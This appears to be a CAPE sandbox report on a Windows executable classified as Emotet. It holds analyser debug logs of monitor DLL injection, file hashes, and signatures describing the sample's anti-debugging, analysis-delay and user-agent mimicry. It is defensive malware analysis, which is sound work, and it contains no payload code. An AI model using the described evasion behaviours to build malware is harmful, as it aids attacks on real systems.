2019-10-10 02:02:55,484 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:02:55,609 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:02:55,609 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 02:02:55,671 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1420.
2019-10-10 02:02:55,687 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:55,766 [root] DEBUG: DLL loaded at 0x000007FEF80B0000: c:\windows\system32\wbem\wmisvc (0x40000 bytes).
2019-10-10 02:02:55,782 [root] DEBUG: DLL loaded at 0x000007FEF9D90000: C:\Windows\system32\wbemcomn (0x86000 bytes).
2019-10-10 02:02:55,796 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-10-10 02:02:55,812 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-10-10 02:02:55,859 [root] DEBUG: DLL unloaded from 0x000007FEF80B0000.
2019-10-10 02:02:55,875 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 02:02:56,030 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 02:02:56,046 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 02:02:56,062 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1132.
2019-10-10 02:02:56,094 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:57,342 [root] DEBUG: DLL loaded at 0x000007FEF9E80000: C:\Windows\system32\VSSAPI (0x1b0000 bytes).
2019-10-10 02:02:57,357 [root] DEBUG: DLL loaded at 0x000007FEFB270000: C:\Windows\system32\ATL (0x19000 bytes).
2019-10-10 02:02:57,372 [root] DEBUG: DLL loaded at 0x000007FEF9E60000: C:\Windows\system32\VssTrace (0x17000 bytes).
2019-10-10 02:02:57,404 [root] DEBUG: DLL loaded at 0x000007FEFA870000: C:\Windows\system32\samcli (0x14000 bytes).
2019-10-10 02:02:57,420 [root] DEBUG: DLL loaded at 0x000007FEFB820000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2019-10-10 02:02:57,434 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-10-10 02:02:57,450 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-10-10 02:02:57,529 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2019-10-10 02:02:57,575 [root] DEBUG: DLL loaded at 0x000007FEF9540000: C:\Windows\system32\wbem\wbemcore (0x12f000 bytes).
2019-10-10 02:02:57,638 [root] DEBUG: DLL loaded at 0x000007FEF94D0000: C:\Windows\system32\wbem\esscli (0x6f000 bytes).
2019-10-10 02:02:57,654 [root] DEBUG: DLL loaded at 0x000007FEF9A00000: C:\Windows\system32\wbem\FastProx (0xe2000 bytes).
2019-10-10 02:02:57,668 [root] DEBUG: DLL loaded at 0x000007FEF9980000: C:\Windows\system32\NTDSAPI (0x27000 bytes).
2019-10-10 02:02:57,684 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 02:02:57,700 [root] DEBUG: DLL unloaded from 0x000007FEF80B0000.
2019-10-10 02:02:57,700 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 02:02:57,732 [root] INFO: Started WMI Service
2019-10-10 02:02:57,732 [root] DEBUG: DLL loaded at 0x000007FEFCAC0000: C:\Windows\system32\authZ (0x2f000 bytes).
2019-10-10 02:02:57,732 [root] INFO: Attaching to WMI service (pid 1544)
2019-10-10 02:02:57,746 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:02:57,763 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:02:57,763 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2548.
2019-10-10 02:02:57,778 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:57,778 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:02:57,809 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 02:02:57,809 [root] DEBUG: Loader: Injecting process 1544 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:57,825 [root] DEBUG: DLL loaded at 0x000007FEF90B0000: C:\Windows\system32\wbem\repdrvfs (0x73000 bytes).
2019-10-10 02:02:57,825 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2368, handle 0x84
2019-10-10 02:02:57,841 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:02:57,855 [root] WARNING: File at path "C:\Windows\sysnative\wbem\repository\WRITABLE.TST" does not exist, skip.
2019-10-10 02:02:57,855 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 02:02:57,871 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 02:02:57,888 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\system32\Wevtapi (0x6d000 bytes).
2019-10-10 02:02:57,918 [root] DEBUG: set_caller_info: Adding region at 0x0000000001FB0000 to caller regions list.
2019-10-10 02:02:57,918 [root] DEBUG: DLL unloaded from 0x000007FEFCB00000.
2019-10-10 02:02:57,934 [root] DEBUG: DLL loaded at 0x0000000002C50000: C:\esgppejl\dll\pZBYujCR (0xe3000 bytes).
2019-10-10 02:02:57,950 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:02:57,966 [root] DEBUG: DLL unloaded from 0x0000000002C50000.
2019-10-10 02:02:58,105 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2019-10-10 02:02:58,323 [root] DEBUG: InjectDll: DLL injection via thread failed.
2019-10-10 02:02:58,323 [root] DEBUG: Failed to inject DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:58,371 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 1544, error: -8
2019-10-10 02:02:58,387 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2019-10-10 02:02:58,558 [root] DEBUG: DLL loaded at 0x000007FEF80F0000: C:\Windows\system32\wbem\wmiprvsd (0xbc000 bytes).
2019-10-10 02:02:58,683 [root] DEBUG: DLL loaded at 0x000007FEFA0C0000: C:\Windows\system32\NCObjAPI (0x16000 bytes).
2019-10-10 02:02:58,713 [root] DEBUG: DLL loaded at 0x000007FEF6080000: C:\Windows\system32\wbem\wbemess (0x7e000 bytes).
2019-10-10 02:02:58,746 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2932.
2019-10-10 02:02:58,746 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:58,963 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1396.
2019-10-10 02:02:59,135 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:02:59,181 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1860.
2019-10-10 02:02:59,259 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:59,276 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2216.
2019-10-10 02:02:59,276 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2532.
2019-10-10 02:02:59,369 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1756.
2019-10-10 02:02:59,401 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2660.
2019-10-10 02:02:59,415 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2180.
2019-10-10 02:02:59,431 [root] DEBUG: CreateThread: Initialising breakpoints for thread 836.
2019-10-10 02:02:59,526 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1720.
2019-10-10 02:02:59,727 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2812.
2019-10-10 02:03:00,648 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 552
2019-10-10 02:03:00,710 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:03:00,710 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:03:00,805 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:03:00,867 [root] DEBUG: Loader: Injecting process 552 (thread 736) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:00,882 [root] DEBUG: Process image base: 0x00000000FF670000
2019-10-10 02:03:00,898 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:00,914 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF6CF000 - 0x000007FEFF430000
2019-10-10 02:03:00,992 [root] DEBUG: InjectDllViaIAT: Allocated 0x238 bytes for new import table at 0x00000000FF6D0000.
2019-10-10 02:03:00,992 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:03:01,101 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:01,101 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 552
2019-10-10 02:03:01,101 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:03:01,538 [root] DEBUG: Process dumps disabled.
2019-10-10 02:03:01,756 [root] DEBUG: DLL loaded at 0x000007FEFB060000: C:\Windows\system32\wbem\ncprov (0x16000 bytes).
2019-10-10 02:03:02,068 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1236.
2019-10-10 02:03:02,084 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1836.
2019-10-10 02:03:02,645 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1432.
2019-10-10 02:03:07,293 [root] INFO: Disabling sleep skipping.
2019-10-10 02:03:07,293 [root] DEBUG: DLL unloaded from 0x74D10000.
2019-10-10 02:03:07,309 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:03:07,309 [root] WARNING: Unable to hook LockResource
2019-10-10 02:03:07,434 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 02:03:07,434 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 02:03:07,434 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:03:07,450 [root] DEBUG: Debugger initialised.
2019-10-10 02:03:07,496 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 552 at 0x00000000741B0000, image base 0x00000000FF670000, stack from 0x0000000000260000-0x0000000000270000
2019-10-10 02:03:07,496 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -Embedding.
2019-10-10 02:03:07,887 [root] DEBUG: AddTrackedRegion: EntryPoint 0xa9b4, Entropy 5.872102e+00
2019-10-10 02:03:07,887 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FF670000 size 0x1000 added to tracked regions.
2019-10-10 02:03:08,121 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:03:08,137 [root] INFO: Added new process to list with pid: 552
2019-10-10 02:03:08,137 [root] INFO: Monitor successfully loaded in process with pid 552.
2019-10-10 02:03:08,339 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:03:08,355 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 02:03:08,433 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 02:03:08,744 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:03:08,744 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2708.
2019-10-10 02:03:08,808 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:03:08,869 [root] DEBUG: DLL loaded at 0x000007FEF9D50000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-10-10 02:03:08,869 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2524.
2019-10-10 02:03:08,979 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 02:03:08,994 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 02:03:09,056 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 02:03:09,243 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2516.
2019-10-10 02:03:11,599 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:03:18,651 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 02:03:21,099 [root] DEBUG: DLL unloaded from 0x000007FEF7210000.
2019-10-10 02:03:49,351 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:03:55,279 [root] INFO: Announced 64-bit process name: taskhost.exe pid: 2344
2019-10-10 02:04:13,250 [root] DEBUG: DLL loaded at 0x000007FEFA1D0000: C:\Windows\System32\wscinterop (0x28000 bytes).
2019-10-10 02:04:22,128 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:04:22,142 [root] DEBUG: DLL loaded at 0x000007FEF9C40000: C:\Windows\System32\WSCAPI (0x13000 bytes).
2019-10-10 02:04:22,206 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:04:22,315 [root] DEBUG: DLL loaded at 0x000007FEF7290000: C:\Windows\System32\wscui.cpl (0x11f000 bytes).
2019-10-10 02:04:22,424 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:04:22,440 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9C40000 to caller regions list.
2019-10-10 02:04:22,565 [root] DEBUG: Loader: Injecting process 2344 (thread 2564) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,611 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA1D0000 to caller regions list.
2019-10-10 02:04:22,704 [root] DEBUG: Process image base: 0x00000000FFC30000
2019-10-10 02:04:22,799 [root] DEBUG: DLL loaded at 0x000007FEF5250000: C:\Windows\System32\werconcpl (0x13c000 bytes).
2019-10-10 02:04:22,861 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,877 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFC44000 - 0x000007FEFF430000
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEF9900000: C:\Windows\System32\framedynos (0x4c000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Allocated 0x238 bytes for new import table at 0x00000000FFC50000.
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEF8090000: C:\Windows\System32\wercplsupport (0x19000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:04:22,891 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,891 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2344
2019-10-10 02:04:22,891 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:04:22,891 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9900000 to caller regions list.
2019-10-10 02:04:22,891 [root] DEBUG: Process dumps disabled.
2019-10-10 02:04:22,907 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8090000 to caller regions list.
2019-10-10 02:04:22,907 [root] INFO: Disabling sleep skipping.
2019-10-10 02:04:22,923 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF5250000 to caller regions list.
2019-10-10 02:04:22,923 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:04:22,923 [root] WARNING: Unable to hook LockResource
2019-10-10 02:04:22,923 [root] DEBUG: DLL loaded at 0x000007FEF8390000: C:\Windows\System32\msxml6 (0x1f2000 bytes).
2019-10-10 02:04:22,938 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:04:22,938 [root] DEBUG: Debugger initialised.
2019-10-10 02:04:22,938 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 2344 at 0x00000000741B0000, image base 0x00000000FFC30000, stack from 0x0000000000215000-0x0000000000220000
2019-10-10 02:04:22,938 [root] DEBUG: Commandline: C:\Windows\sysnative\"taskhost.exe".
2019-10-10 02:04:22,938 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list.
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2ce0, Entropy 5.003625e+00
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFC30000 size 0x1000 added to tracked regions.
2019-10-10 02:04:22,954 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFA1C0000: C:\Windows\System32\hcproviders (0xb000 bytes).
2019-10-10 02:04:22,970 [root] INFO: Added new process to list with pid: 2344
2019-10-10 02:04:22,970 [root] INFO: Monitor successfully loaded in process with pid 2344.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:04:22,970 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3036.
2019-10-10 02:04:22,970 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:04:22,986 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA1C0000 to caller regions list.
2019-10-10 02:04:23,016 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2448.
2019-10-10 02:04:37,509 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1304.
2019-10-10 02:04:37,509 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:04:37,525 [root] DEBUG: DLL loaded at 0x000007FEFA040000: C:\Windows\System32\wdi (0x19000 bytes).
2019-10-10 02:04:43,328 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:04:49,240 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1428.
2019-10-10 02:04:49,240 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 02:04:49,256 [root] DEBUG: DLL loaded at 0x000007FEF8070000: C:\Windows\system32\radarrs (0x18000 bytes).
2019-10-10 02:04:49,286 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\COMCTL32 (0x1f4000 bytes).
2019-10-10 02:05:01,220 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 02:05:01,220 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2796.
2019-10-10 02:05:01,267 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2424.
2019-10-10 02:05:07,243 [root] DEBUG: DLL loaded at 0x000007FEF7440000: C:\Windows\system32\RstrtMgr (0x33000 bytes).
2019-10-10 02:05:07,243 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:07,243 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:13,249 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2019-10-10 02:05:19,223 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:19,239 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2019-10-10 02:05:23,092 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-10-10 02:05:23,108 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2408.
2019-10-10 02:05:23,108 [root] DEBUG: DLL loaded at 0x000007FEF8CA0000: C:\Windows\system32\wer (0x7c000 bytes).
2019-10-10 02:05:23,138 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x00000000FFC30000.
2019-10-10 02:05:41,328 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:53,325 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1856.
2019-10-10 02:05:53,325 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:53,341 [root] DEBUG: DLL loaded at 0x000007FEF7400000: C:\Windows\system32\wbem\wmiprov (0x3c000 bytes).
2019-10-10 02:05:53,404 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1992.
2019-10-10 02:05:53,404 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:53,450 [root] DEBUG: DLL unloaded from 0x000007FEFB0D0000.
2019-10-10 02:05:55,056 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2288.
2019-10-10 02:05:55,056 [root] DEBUG: DLL unloaded from 0x0000000077110000.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-10-10 01:01:37 2019-10-10 01:06:15

File Details

File Name ygg9ytft62s5ip.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
SHA512 41601f2bafff43599da6e50b07952f743669e7cafabebcc1b1caf441c89425814c22b5094fe1bc72bc414c0c3f1024fbfaa54688cfc0c39c1f016a71d609ac42
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
At least one process apparently crashed during execution
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1964 trigged the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: prepmspterm.exe, PID 2128
Mimics the system's user agent string for its own requests
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: svchost.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
